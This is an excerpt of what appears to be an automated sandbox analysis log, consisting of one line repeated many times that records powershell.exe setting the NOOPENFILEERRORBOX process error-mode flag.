            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
